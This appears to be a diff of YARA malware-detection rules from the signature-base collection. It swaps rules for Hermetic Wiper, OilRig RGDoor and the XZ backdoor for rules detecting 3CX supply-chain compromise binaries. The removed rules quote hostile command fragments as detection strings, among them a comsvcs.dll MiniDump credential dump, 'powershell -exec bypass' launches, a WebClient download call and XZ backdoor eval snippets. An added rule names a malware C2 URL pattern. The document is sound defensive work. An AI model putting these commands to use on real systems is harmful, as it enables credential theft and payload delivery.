+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L3-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4a5fe7016e27431407435541ab71ab00e6fd53418e2ebc19f8764c98728b89a6"
-		score = 65
-		quality = 27
+		logic_hash = "68f4007791d365900c84e32e076aa3cac9f3a9ed46de297f1005306554ee13f5"
+		score = 85
+		quality = 85
 		tags = "FILE"
-		hash1 = "1313398e2f39fcf17225c7e915b92bd74292d427163112d70b82f271359b84d5"
-		hash2 = "2382e6908e6b44c0676c537cb8caa239c8938cb01e62a45c7247d40ab7dbf0ad"
-		hash3 = "23cf3e7f41a755a45e396e5caa3e753e64655b91fe665808f71aa68718670dc8"
-		hash4 = "23f018135afc4890e1e09bef9386e45e2236fc43550383b7888cddbdefbcd950"
-		hash5 = "4a8da078a02fc49b7f13cd19d10519b1bf31ed0ab04268f018ad4733918e28ff"
-		hash6 = "4cca7b530213ef71b2e69a5b11178b61044f93dc60f4e8e568ddb3bb06749ba2"
-		hash7 = "5390271899e1ebf884380f5da7d26dff527d13922d3b3f8a3b5ec9152b9dfa40"
-		hash8 = "53ef3029f36a3a2b912a722d64eef04f599f6f683c6dcb31a122ab1c98f38700"
-		hash9 = "7f7d78931370fa693cbfa50aadecc09b4ab93917dcde3a653bd67fa6dc274cdc"
-		hash10 = "8147cc97b6203c7eccfbd10457eb52527f74180ebae79bf3cb9c9edb582e708c"
-		hash11 = "8a3113ceb45725539e4ccef5ea1482c29b2bbe0ce7ede72f59f9949a0e04c5cd"
-		hash12 = "a0c77993f84ca8fb3096579088326bc907b003327f5885660ea5ba47e2cbc6de"
-		hash13 = "a20ac5e0bfa2ee3cb4092907420c23d1f94a1ed1b59cc3d351e5602d7206178c"
-		hash14 = "b201969ed7bf782d01011211b48bfccb9dd41a3a5a7456cdff2167f1e4d1b954"
-		hash15 = "b2bac49288329a777e7aa7001e9383eec75719c08f2aa8c278b44fabeb74844f"
-		hash16 = "b772dce92319bb48df39db6ab701761bd7645a771fd7f394510d5951695e7e96"
-		hash17 = "c116cc4db6f77c580c1c4f8acda537ed04e597739bc83011773dbeb77adf93e3"
-		hash18 = "ca1b9026b5d69c0981ca088330180d4865602fc2b514fd838664d3e11eab4468"
-		hash19 = "d7a814d677f9f9dd9666dc4f4bb9cca88fa90bdb074e87006e8810eef9a0fb32"
-		hash20 = "e4acfb69006b8aecf5801e36e2c69ccfeea2e8cbad4ceda9228d2dae2c8fd023"
-		hash21 = "f9d6b894ca907145464058a4e2c78de84bf592609b46f3573bfd9e0029e1c778"
+		hash1 = "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"
+		hash2 = "c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02"
+		hash3 = "cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2"
 
 	strings:
-		$s1 = /\(chr\s+\d+\)\s*\(chr\s+\d+\)\s*\(chr\s+\d+\)\s*\(chr\s+\d+\)/
-		$s2 = /vl\-list\-\>string\s+\'\(\d+\s+\d+\s+\d+\s+\d+\s+\d+\s+/
-		$m1 = "strcat" nocase fullword
-		$m2 = "write-line" nocase fullword
-		$m3 = "open" nocase fullword
-		$m4 = /acad\w*\.lsp\"/ nocase fullword
-		$n1 = "vl-registry-write" nocase fullword
-		$n2 = "NOHIDDEN" nocase fullword
-		$n3 = "vlax-create-object " nocase fullword
+		$opa1 = { 4C 89 F1 4C 89 EA 41 B8 40 00 00 00 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 F0 FF 15 ?? ?? ?? ?? 4C 8D 4C 24 ?? 45 8B 01 4C 89 F1 4C 89 EA FF 15 }
+		$opa2 = { 48 C7 44 24 ?? 00 00 00 00 4C 8D 7C 24 ?? 48 89 F9 48 89 C2 41 89 E8 4D 89 F9 FF 15 ?? ?? ?? ?? 41 83 3F 00 0F 84 ?? ?? ?? ?? 0F B7 03 3D 4D 5A 00 00}
+		$opa3 = { 41 80 7C 00 ?? FE 75 ?? 41 80 7C 00 ?? ED 75 ?? 41 80 7C 00 ?? FA 75 ?? 41 80 3C 00 CE}
+		$opa4 = { 44 0F B6 CD 46 8A 8C 0C ?? ?? ?? ?? 45 30 0C 0E 48 FF C1}
+		$opb1 = { 41 B8 40 00 00 00 49 8B D5 49 8B CC FF 15 ?? ?? ?? ?? 85 C0 74 ?? 41 FF D4 44 8B 45 ?? 4C 8D 4D ?? 49 8B D5 49 8B CC FF 15 }
+		$opb2 = { 44 8B C3 48 89 44 24 ?? 48 8B 5C 24 ?? 4C 8D 4D ?? 48 8B CB 48 89 74 24 ?? 48 8B D0 4C 8B F8 FF 15 }
+		$opb3 = { 80 78 ?? FE 75 ?? 80 78 ?? ED 75 ?? 80 38 FA 75 ?? 80 78 ?? CE }
+		$opb4 = { 49 63 C1 44 0F B6 44 05 ?? 44 88 5C 05 ?? 44 88 02 0F B6 54 05 ?? 49 03 D0 0F B6 C2 0F B6 54 05 ?? 41 30 12}
 
 	condition:
-		filesize < 1MB and uint8( 0 ) == 0x28 and ( 1 of ( $s* ) or all of ( $m* ) or all of ( $n* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 5MB and pe.characteristics & pe.DLL and ( 2 of ( $opa* ) or 2 of ( $opb* ) )
 }
-rule SIGNATURE_BASE_APT_UA_Hermetic_Wiper_Feb22_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_NK_3CX_Malicious_Samples_Mar23_2 : FILE
 {
 	meta:
-		description = "Detects Hermetic Wiper malware"
+		description = "Detects malicious DLLs related to 3CX compromise (decrypted payload)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2cbe4a69-e31a-5f5f-ab1a-9d71d16fb30f"
-		date = "2022-02-24"
+		id = "bf3597ff-d62b-5d21-9c9b-e46e685284cf"
+		date = "2023-03-29"
 		modified = "2023-12-05"
-		reference = "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_hermetic_wiper.yar#L2-L38"
+		reference = "https://twitter.com/dan__mayer/status/1641170769194672128?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L32-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1cf124f7533a060da8aff1a18f64a94b183502e58ffdfca012d72d99d30225ba"
-		score = 75
-		quality = 85
+		logic_hash = "dec8310c1f5b304a755737a0005bb33b1762f21ed380b2b98b0f5427948ab930"
+		score = 80
+		quality = 60
 		tags = "FILE"
-		hash1 = "0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da"
-		hash2 = "3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767"
-		hash3 = "2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf"
-		hash4 = "1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591"
+		hash1 = "aa4e398b3bd8645016d8090ffc77d15f926a8e69258642191deb4e68688ff973"
 
 	strings:
-		$xc1 = { 00 5C 00 5C 00 2E 00 5C 00 50 00 68 00 79 00 73
-               00 69 00 63 00 61 00 6C 00 44 00 72 00 69 00 76
-               00 65 00 25 00 75 00 00 00 5C 00 5C 00 2E 00 5C
-               00 45 00 50 00 4D 00 4E 00 54 00 44 00 52 00 56
-               00 5C 00 25 00 75 00 00 00 5C 00 5C 00 2E 00 5C
-               00 00 00 00 00 25 00 73 00 25 00 2E 00 32 00 73
-               00 00 00 00 00 24 00 42 00 69 00 74 00 6D 00 61
-               00 70 00 00 00 24 00 4C 00 6F 00 67 00 46 00 69
-               00 6C 00 65 }
-		$sc1 = { 00 44 00 72 00 69 00 76 00 65 00 72 00 73 00 00
-               00 64 00 72 00 76 00 00 00 53 00 79 00 73 00 74
-               00 65 00 6D 00 33 00 32 }
-		$s1 = "\\\\?\\C:\\Windows\\System32\\winevt\\Logs" wide fullword
-		$s2 = "\\\\.\\EPMNTDRV\\%u" wide fullword
-		$s3 = "DRV_XP_X64" wide fullword
-		$s4 = "%ws%.2ws" wide fullword
-		$op1 = { 8b 7e 08 0f 57 c0 8b 46 0c 83 ef 01 66 0f 13 44 24 20 83 d8 00 89 44 24 18 0f 88 3b 01 00 00 }
-		$op2 = { 13 fa 8b 55 f4 4e 3b f3 7f e6 8a 45 0f 01 4d f0 0f 57 c0 }
+		$s1 = "raw.githubusercontent.com/IconStorages/images/main/icon%d.ico" wide fullword
+		$s2 = "https://raw.githubusercontent.com/IconStorages" wide fullword
+		$s3 = "icon%d.ico" wide fullword
+		$s4 = "__tutmc" ascii fullword
+		$op1 = { 2d ee a1 00 00 c5 fa e6 f5 e9 40 fe ff ff 0f 1f 44 00 00 75 2e c5 fb 10 0d 46 a0 00 00 44 8b 05 7f a2 00 00 e8 0a 0e 00 00 }
+		$op4 = { 4c 8d 5c 24 71 0f 57 c0 48 89 44 24 60 89 44 24 68 41 b9 15 cd 5b 07 0f 11 44 24 70 b8 b1 68 de 3a 41 ba a4 7b 93 02 }
+		$op5 = { f7 f3 03 d5 69 ca e8 03 00 00 ff 15 c9 0a 02 00 48 8d 44 24 30 45 33 c0 4c 8d 4c 24 38 48 89 44 24 20 }
 
 	condition:
-		( uint16( 0 ) == 0x5a53 or uint16( 0 ) == 0x5a4d ) and filesize < 400KB and ( 1 of ( $x* ) or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and 3 of them or 5 of them
 }
-rule SIGNATURE_BASE_APT_UA_Hermetic_Wiper_Artefacts_Feb22_1
+rule SIGNATURE_BASE_APT_MAL_NK_3CX_Malicious_Samples_Mar23_3
 {
 	meta:
-		description = "Detects artefacts found in Hermetic Wiper malware related intrusions"
-		author = "Florian Roth (Nextron Systems)"
-		id = "77f793c1-b02c-59c3-b3e4-75758f5b3b8d"
-		date = "2022-02-25"
+		description = "Detects malicious DLLs related to 3CX compromise (decrypted payload)"
+		author = "Florian Roth , X__Junior (Nextron Systems)"
+		id = "d2d361b6-8485-57eb-b6eb-88785f42e93e"
+		date = "2023-03-29"
 		modified = "2023-12-05"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_hermetic_wiper.yar#L40-L70"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L56-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5e917618a5172c68b4b32ba9e63402c2a98ccb027276b317ec169a4fef219de1"
-		score = 75
+		logic_hash = "adfe04904d796690631e5841ee1ee10c767f9f4c340e5b9df78918e981359d4d"
+		score = 80
 		quality = 85
 		tags = ""
+		hash1 = "aa4e398b3bd8645016d8090ffc77d15f926a8e69258642191deb4e68688ff973"
 
 	strings:
-		$sx1 = "/c powershell -c \"rundll32 C:\\windows\\system32\\comsvcs.dll MiniDump" ascii wide
-		$sx2 = "appdata\\local\\microsoft\\windows\\winupd.log" ascii wide
-		$sx3 = "AppData\\Local\\Microsoft\\Windows\\Winupd.log" ascii wide
-		$sx4 = "CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1" ascii wide
-		$sx5 = "\\policydefinitions\\postgresql.exe" ascii wide
-		$sx6 = "powershell -v 2 -exec bypass -File text.ps1" ascii wide
-		$sx7 = "powershell -exec bypass gp.ps1" ascii wide
-		$sx8 = "powershell -exec bypass -File link.ps1" ascii wide
-		$sx9 = " 1> \\\\127.0.0.1\\ADMIN$\\__16" ascii wide
-		$sa1 = "(New-Object System.Net.WebClient).DownloadFile(" ascii wide
-		$sa2 = "CSIDL_SYSTEM_DRIVE\\temp\\" ascii wide
-		$sa3 = "1> \\\\127.0.0.1\\ADMIN$" ascii wide
-		$fp1 = "<html" ascii
+		$opa1 = { 41 81 C0 ?? ?? ?? ?? 02 C8 49 C1 E9 ?? 41 88 4B ?? 4D 03 D1 8B C8 45 8B CA C1 E1 ?? 33 C1 41 69 D0 ?? ?? ?? ?? 8B C8 C1 E9 ?? 33 C1 8B C8 C1 E1 ?? 81 C2 ?? ?? ?? ?? 33 C1 43 8D 0C 02 02 C8 49 C1 EA ?? 41 88 0B 8B C8 C1 E1 ?? 33 C1 44 69 C2 ?? ?? ?? ?? 8B C8 C1 E9 ?? 33 C1 8B C8 C1 E1 ?? 41 81 C0 }
+		$opa2 = { 8B C8 41 69 D1 ?? ?? ?? ?? C1 E1 ?? 33 C1 45 8B CA 8B C8 C1 E9 ?? 33 C1 81 C2 ?? ?? ?? ?? 8B C8 C1 E1 ?? 33 C1 41 8B C8 4C 0F AF CF 44 69 C2 ?? ?? ?? ?? 4C 03 C9 45 8B D1 4C 0F AF D7}
+		$opb1 = { 45 33 C9 48 89 6C 24 ?? 48 8D 44 24 ?? 48 89 6C 24 ?? 8B D3 48 89 B4 24 ?? ?? ?? ?? 48 89 44 24 ?? 45 8D 41 ?? FF 15 }
+		$opb2 = { 44 8B 0F 45 8B C6 48 8B 4D ?? 49 8B D7 44 89 64 24 ?? 48 89 7C 24 ?? 44 89 4C 24 ?? 4C 8D 4D ?? 48 89 44 24 ?? 44 89 64 24 ?? 4C 89 64 24 ?? FF 15}
+		$opb3 = { 48 FF C2 66 44 39 2C 56 75 ?? 4C 8D 4C 24 ?? 45 33 C0 48 8B CE FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 44 0F B7 44 24 ?? 33 F6 48 8B 54 24 ?? 45 33 C9 48 8B 0B 48 89 74 24 ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 74 24 ?? FF 15 }
+		$opb4 = { 33 C0 48 8D 6B ?? 4C 8D 4C 24 ?? 89 44 24 ?? BA ?? ?? ?? ?? 48 89 44 24 ?? 48 8B CD 89 44 24 ?? 44 8D 40 ?? 8B F8 FF 15}
 
 	condition:
-		1 of ( $sx* ) or all of ( $sa* ) and not 1 of ( $fp* )
+		( all of ( $opa* ) ) or ( 1 of ( $opa* ) and 1 of ( $opb* ) ) or ( 3 of ( $opb* ) )
 }
-rule SIGNATURE_BASE_APT_UA_Hermetic_Wiper_Scheduled_Task_Feb22_1
+rule SIGNATURE_BASE_SUSP_APT_MAL_NK_3CX_Malicious_Samples_Mar23_1
 {
 	meta:
-		description = "Detects scheduled task pattern found in Hermetic Wiper malware related intrusions"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a628f773-9c71-5979-a4db-37b6b6bd6a56"
-		date = "2022-02-25"
-		modified = "2023-12-05"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_hermetic_wiper.yar#L72-L88"
+		description = "Detects marker found in malicious DLLs related to 3CX compromise"
+		author = "X__Junior, Florian Roth (Nextron Systems)"
+		id = "9fc6eb94-d02f-5bcd-9f55-b6c6a8301b4f"
+		date = "2023-03-29"
+		modified = "2023-04-20"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L81-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "56368ba1c97fe3455312b6ee86dcd1a21677f7dfa3836e76ada4b236a5b2c171"
-		score = 85
+		logic_hash = "dcce1f5e769a2821d746a960cd333f8042fb71c8469aa41c29bbbd0dce79369c"
+		score = 75
 		quality = 85
 		tags = ""
+		hash1 = "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"
+		hash2 = "c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02"
+		hash3 = "cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2"
 
 	strings:
-		$a0 = "<Task version=" ascii wide
-		$sa1 = "CSIDL_SYSTEM_DRIVE\\temp" ascii wide
-		$sa2 = "postgresql.exe 1> \\\\127.0.0.1\\ADMIN$" ascii wide
-		$sa3 = "cmd.exe /Q /c move CSIDL_SYSTEM_DRIVE" ascii wide
+		$opx1 = { 41 80 7C 00 FD FE 75 ?? 41 80 7C 00 FE ED 75 ?? 41 80 7C 00 FF FA 75 ?? 41 80 3C 00 CE }
+		$opx2 = { 80 78 ?? FE 75 ?? 80 78 ?? ED 75 ?? 80 38 FA 75 ?? 80 78 ?? CE }
 
 	condition:
-		$a0 and 1 of ( $s* )
+		1 of them
 }
-
-rule SIGNATURE_BASE_Oilrig_Rgdoor_Gen1 : FILE
+rule SIGNATURE_BASE_APT_SUSP_NK_3CX_RC4_Key_Mar23_1 : FILE
 {
 	meta:
-		description = "Detects RGDoor backdoor used by OilRig group"
+		description = "Detects RC4 key used in 3CX binaries known to be malicious"
 		author = "Florian Roth (Nextron Systems)"
-		id = "68ac1f35-4eaa-5899-b66c-296d7c5fa462"
-		date = "2018-01-27"
+		id = "18ea2185-11a1-51ad-a51a-df9e6357bb58"
+		date = "2023-03-29"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_rgdoor.yar#L13-L39"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L100-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "896900f788337327d444495ba0cd4c7c327bb4f9166bc2a981a348cf2c34cbdb"
-		score = 80
+		logic_hash = "8324b537b149ad3816b12ae0f887f66a284a8e1ef4fe7cf51eb21d59c0f055b9"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a9c92b29ee05c1522715c7a2f9c543740b60e36373cb47b5620b1f3d8ad96bfa"
+		hash1 = "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"
+		hash2 = "59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983"
+		hash3 = "aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868"
+		hash4 = "c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02"
 
 	strings:
-		$c1 = { 00 63 6D 64 24 00 00 00 00 72 00 00 00 00 00 00 00 75 70 6C 6F
-              61 64 24 }
-		$c2 = { 63 61 6E 27 74 20 6F 70 65 6E 20 66 69 6C 65 3A 20 00 00 00 00
-              00 00 00 64 6F 77 6E 6C 6F 61 64 24 }
-		$s1 = "MyNativeModule.dll" fullword ascii
-		$s2 = "RGSESSIONID=" fullword ascii
-		$s3 = "download$" fullword ascii
-		$s4 = ".?AVCHelloWorld@@" fullword ascii
+		$x1 = "3jB(2bsG#@c7"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "47cb127aad6c7c9954058e61a2a6429a" or 1 of ( $c* ) or 2 of them )
+		( uint16( 0 ) == 0xcfd0 or uint16( 0 ) == 0x5a4d ) and $x1
 }
-rule SIGNATURE_BASE_MSIL_SUSP_OBFUSC_Xorstringsnet : FILE
+
+rule SIGNATURE_BASE_SUSP_3CX_App_Signed_Binary_Mar23_1 : FILE
 {
 	meta:
-		description = "Detects XorStringsNET string encryption, and other obfuscators derived from it"
-		author = "dr4k0nia"
-		id = "f0724ca6-4bfe-5b88-9396-a58aa7461fd6"
-		date = "2023-03-26"
+		description = "Detects 3CX application binaries signed with a certificate and created in a time frame in which other known malicious binaries have been created"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b6ce4c1d-1b7b-5e0c-af4c-05cb3ad0a4e0"
+		date = "2023-03-29"
 		modified = "2023-12-05"
-		reference = "https://github.com/dr4k0nia/yara-rules"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_net_xorstrings.yar#L2-L27"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L119-L139"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6d023a80bd8f5709721c3ace8a7230b847ca4bd2a1aff502a25333ffc8bf75ca"
-		score = 75
+		logic_hash = "3834b5ebb5a0db27a452fda1c97c921b2c9c8702505738232b15a3ed4a47dc47"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		hash1 = "fad482ded2e25ce9e1dd3d3ecc3227af714bdfbbde04347dbc1b21d6a3670405"
+		hash2 = "dde03348075512796241389dfea5560c20a3d2a2eac95c894e7bbed5e85a0acc"
 
 	strings:
-		$pattern = { 06 1E 58 07 8E 69 FE 17 }
-		$a1 = "_CorDllMain" ascii
-		$a2 = "_CorExeMain" ascii
-		$a3 = "mscorlib" ascii fullword
-		$a4 = ".cctor" ascii fullword
-		$a5 = "System.Private.Corlib" ascii
-		$a6 = "<Module>" ascii fullword
-		$a7 = "<PrivateImplementationsDetails{" ascii
+		$sa1 = "3CX Ltd1"
+		$sa2 = "3CX Desktop App" wide
+		$sc1 = { 1B 66 11 DF 9C 9A 4D 6E CC 8E D5 0C 9B 91 78 73 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 25MB and $pattern and 2 of ( $a* )
+		uint16( 0 ) == 0x5a4d and pe.timestamp > 1669680000 and pe.timestamp < 1680108505 and all of ( $sa* ) and $sc1
 }
-rule SIGNATURE_BASE_BKDR_Xzutil_Script_CVE_2024_3094_Mar24_1 : CVE_2024_3094
+rule SIGNATURE_BASE_SUSP_3CX_MSI_Signed_Binary_Mar23_1 : FILE
 {
 	meta:
-		description = "Detects make file and script contents used by the backdoored XZ library (xzutil) CVE-2024-3094."
-		author = "Florian Roth"
-		id = "6b62ffc2-d0a7-5810-97a3-c48f7fac300e"
-		date = "2024-03-30"
-		modified = "2024-04-24"
-		reference = "https://www.openwall.com/lists/oss-security/2024/03/29/4"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/bkdr_xz_util_cve_2024_3094.yar#L2-L17"
+		description = "Detects 3CX MSI installers signed with a known compromised certificate and signed in a time frame in which other known malicious binaries have been signed"
+		author = "Florian Roth (Nextron Systems)"
+		id = "15d6d8ca-6982-5095-9879-ce97269a71c6"
+		date = "2023-03-29"
+		modified = "2023-12-05"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L141-L166"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3"
-		logic_hash = "8d3f5f078a5c827208e04acb7ac1496f473e1236f92561f94d2a3c8156c68ea6"
-		score = 80
+		logic_hash = "b0fa9821a02803473ce8139b19d005968b03c9765cff5b9ae5428a259d88cc9f"
+		score = 60
 		quality = 85
-		tags = "CVE-2024-3094"
+		tags = "FILE"
+		hash1 = "aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868"
+		hash2 = "59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983"
 
 	strings:
-		$x1 = "/bad-3-corrupt_lzma2.xz | tr " ascii
-		$x2 = "/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|" ascii
-		$x3 = "eval $zrKcKQ" ascii
+		$a1 = { 84 10 0C 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
+		$sc1 = { 1B 66 11 DF 9C 9A 4D 6E CC 8E D5 0C 9B 91 78 73 }
+		$s1 = "3CX Ltd1"
+		$s2 = "202303"
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0xcfd0 and $a1 and $sc1 and ( $s1 in ( filesize -20000 .. filesize ) and $s2 in ( filesize -20000 .. filesize ) )
 }
-rule SIGNATURE_BASE_BKDR_Xzutil_Binary_CVE_2024_3094_Mar24_1 : CVE_2024_3094 FILE
+rule SIGNATURE_BASE_APT_MAL_Macos_NK_3CX_Malicious_Samples_Mar23_1 : FILE
 {
 	meta:
-		description = "Detects injected code used by the backdoored XZ library (xzutil) CVE-2024-3094."
-		author = "Florian Roth"
-		id = "6ccdeb6d-67c4-5358-a76b-aef7f047c997"
-		date = "2024-03-30"
-		modified = "2024-04-24"
-		reference = "https://www.openwall.com/lists/oss-security/2024/03/29/4"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/bkdr_xz_util_cve_2024_3094.yar#L19-L46"
+		description = "Detects malicious macOS application related to 3CX compromise (decrypted payload)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ff39e577-7063-5025-bead-68394a86c87c"
+		date = "2023-03-30"
+		modified = "2023-12-05"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L168-L184"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ed364484ff598b0818f9b3249673e684b52394c25b14e47fbca25a5f96ecc970"
-		score = 75
+		logic_hash = "c2733c2f7dcca82e5a0b2301777fb54853d04dfa893bcf88ecbec34d37e1a38a"
+		score = 80
 		quality = 85
-		tags = "CVE-2024-3094, FILE"
-		hash1 = "319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae"
-		hash2 = "605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4"
-		hash3 = "8fa641c454c3e0f76de73b7cc3446096b9c8b9d33d406d38b8ac76090b0344fd"
-		hash4 = "b418bfd34aa246b2e7b5cb5d263a640e5d080810f767370c4d2c24662a274963"
-		hash5 = "cbeef92e67bf41ca9c015557d81f39adaba67ca9fb3574139754999030b83537"
-		hash6 = "5448850cdc3a7ae41ff53b433c2adbd0ff492515012412ee63a40d2685db3049"
+		tags = "FILE"
+		hash1 = "b86c695822013483fa4e2dfdf712c5ee777d7b99cbad8c2fa2274b133481eadb"
+		hash2 = "ac99602999bf9823f221372378f95baa4fc68929bac3a10e8d9a107ec8074eca"
+		hash3 = "51079c7e549cbad25429ff98b6d6ca02dc9234e466dd9b75a5e05b9d7b95af72"
 
 	strings:
-		$op1 = { 48 8d 7c 24 08 f3 ab 48 8d 44 24 08 48 89 d1 4c 89 c7 48 89 c2 e8 ?? ?? ?? ?? 89 c2 }
-		$op2 = { 31 c0 49 89 ff b9 16 00 00 00 4d 89 c5 48 8d 7c 24 48 4d 89 ce f3 ab 48 8d 44 24 48 }
-		$op3 = { 4d 8b 6c 24 08 45 8b 3c 24 4c 8b 63 10 89 85 78 f1 ff ff 31 c0 83 bd 78 f1 ff ff 00 f3 ab 79 07 }
-		$xc1 = { F3 0F 1E FA 55 48 89 F5 4C 89 CE 53 89 FB 81 E7 00 00 00 80 48 83 EC 28 48 89 54 24 18 48 89 4C 24 10 }
+		$s1 = "20230313064152Z0"
+		$s2 = "Developer ID Application: 3CX (33CF4654HL)"
 
 	condition:
-		uint16( 0 ) == 0x457f and ( all of ( $op* ) or $xc1 )
+		( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) and all of them
 }
-rule SIGNATURE_BASE_BKDR_Xzutil_Killswitch_CVE_2024_3094_Mar24_1 : CVE_2024_3094
+rule SIGNATURE_BASE_APT_MAL_Macos_NK_3CX_DYLIB_Mar23_1
 {
 	meta:
-		description = "Detects kill switch used by the backdoored XZ library (xzutil) CVE-2024-3094."
-		author = "Florian Roth"
-		id = "0d28bec4-1d3a-5af0-9e9e-49486fcc62e1"
-		date = "2024-03-30"
-		modified = "2024-04-24"
-		reference = "https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01?permalink_comment_id=5006558#gistcomment-5006558"
